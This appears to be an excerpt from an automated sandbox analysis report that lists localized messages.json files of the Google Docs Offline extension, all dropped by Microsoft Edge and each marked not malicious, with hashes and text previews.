                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                  Malicious:false
